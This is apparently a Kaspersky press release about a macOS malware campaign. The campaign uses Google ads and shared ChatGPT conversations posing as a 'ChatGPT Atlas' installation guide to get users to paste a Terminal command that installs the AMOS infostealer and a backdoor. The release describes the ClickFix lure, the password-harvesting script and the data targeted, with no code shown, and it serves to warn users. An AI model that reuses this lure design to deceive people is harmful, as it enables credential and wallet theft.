Kaspersky Threat Research has identified a new malware campaign that uses paid Google search ads and shared conversations on the official ChatGPT website to trick Mac users into running a command that installs the AMOS (Atomic macOS Stealer) infostealer and a persistent backdoor on their devices.
In the campaign, attackers buy sponsored search ads for queries such as “chatgpt atlas” and direct users to a page that appears to be an installation guide for “ChatGPT Atlas for macOS” hosted at chatgpt.com.
Abuse of ChatGPT’s Sharing Feature
In reality, the page is a shared ChatGPT conversation generated through prompt engineering and then sanitized so that only the step by step “installation” instructions remain.
The guide instructs users to copy a single line of code, open Terminal on macOS, paste the command, and grant all requested permissions.
Kaspersky researchers analysis shows that the command downloads and executes a script from the external domain atlas-extension[.]com.
Infection Flow and ClickFix Technique
The script repeatedly prompts the user for their system password and validates the password by attempting to run system commands.
Once the correct password is supplied, the script downloads the AMOS infostealer, uses the stolen credentials to install it, and launches the malware.
The infection flow represents a variation of the so-called ClickFix technique, in which users are persuaded to manually execute shell commands that retrieve and run code from remote servers.
Data Theft and Backdoor Installation
After installation, AMOS collects data that can be monetized or reused in later intrusions, The malware targets passwords, cookies, and other information from popular browsers, data from cryptocurrency wallets such as Electrum, Coinomi, and Exodus, and information from applications including Telegram Desktop and OpenVPN Connect.
It also searches for files with TXT, PDF, and DOCX extensions in the Desktop, Documents, and Downloads folders, as well as files stored by the Notes application, then exfiltrates this data to attacker controlled infrastructure.
Persistent Access and Broader Threat Trends
In parallel, the attack installs a backdoor that is configured to start automatically on reboot, gives remote access to the compromised system, and duplicates much of AMOS’s data collection logic.
The campaign reflects a broader trend in which infostealers have become one of 2025’s fastest growing threats, with attackers actively experimenting with AI related themes, fake AI tools, and AI generated content to increase the credibility of their lures.
Recent waves have included fake AI browser sidebars and fraudulent clients for popular models; the Atlas themed activity extends this pattern by abusing a legitimate AI platform’s built in content sharing feature.
Expert Commentary and User Trust
“What makes this case effective is not a sophisticated exploit, but the way social engineering is wrapped in a familiar AI context,” said Vladimir Gursky, Malware Analyst at Kaspersky.
“A sponsored link leads to a well-formatted page on a trusted domain, and the ‘installation guide’ is just a single Terminal command.
For many users, that combination of trust and simplicity is enough to bypass their usual caution, yet the result is full compromise of the system and long-term access for the attacker.”
Security Recommendations for Users
Kaspersky recommends that users:
• Treat any unsolicited “guide” that asks them to run Terminal or PowerShell commands with caution, especially when it involves copying and pasting a one line script from a website, document, or chat.
• Close pages or delete messages that ask for such actions if the instructions are unclear, and seek advice from a knowledgeable source before proceeding.
• Consider pasting any suspicious commands into a separate AI or security tool to understand what the code does before executing it.
• Install and maintain reputable security software on all devices, including macOS and Linux systems, such as Kaspersky Premium, to detect and block infostealers and related payloads.
About Kaspersky
Kaspersky is a global cybersecurity and digital privacy company founded in 1997, With over a billion devices protected to date from emerging cyberthreats and targeted attacks.
Kaspersky’s deep threat intelligence and security expertise is constantly transforming into innovative solutions and services to protect businesses, critical infrastructure, governments and consumers around the globe.
Company Profile and Global Reach
The company’s comprehensive security portfolio includes leading endpoint protection, specialized security products and services, as well as Cyber Immune solutions to fight sophisticated and evolving digital threats.
We help nearly 200,000 corporate clients protect what matters most to them, Learn more at www.kaspersky.com.
Read Also
Kaspersky Uncovers a Malicious Campaign Powered by AI-Generated Websites
Kaspersky: Half of 2025 Leaked Passwords Were Already Exposed in Previous Breaches
Kaspersky: 46% of employees in Egypt received cybersecurity training despite rising human errors
